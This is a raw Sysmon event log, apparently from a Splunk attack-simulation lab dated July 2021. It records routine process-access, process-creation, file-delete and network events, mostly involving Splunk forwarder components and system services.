08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.289{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.038{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44AAAF02662DAC0D1B0C0362140DCB41,SHA256=1BEAA2C6A6E02E6888D43889FE3DF6DB3EF22D3AE5AD8D8BFB1EB3E5821D25A2,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:24.050{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31F5BF35CAB9DF509E77F4A5D3CDE4E3,SHA256=99DF0638D7387AEEE91B0A9149F0C56A3C548E4807E3759DD0A6FC41D0D7DEAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:15.739{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61935-false10.0.1.12-8000- 10341000x8000000000000000809943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.819{0C1E0330-F7C5-60EB-D079-00000000D001}34364072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:25.679{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.679{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.664{0C1E0330-F7C5-60EB-D079-00000000D001}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00C73E09AA0B3151157219B6D98D18AB,SHA256=581658017F8879C66CE29C70DB21602A9E8F0A2C7722F9EB2F61F1CBA0C6AB44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC995AD580CD30CC571C527B7F3038DB,SHA256=0973BB5E2079FE8AEAE2A91261A4070FBAAE59006CFCDA3C44FE41EED1FC9553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:25.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE337B53E89D473AA36828EEBAB82E1B,SHA256=14A5E6E7C9BC659B620675FB3DFE9701CAE90876213A089DC9AE1EBA3396B246,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001053689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.979{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:25.979{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-5441-60E8-FA0F-00000000CF01}7396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:25.964{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-5441-60E8-FB0F-00000000CF01}8412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 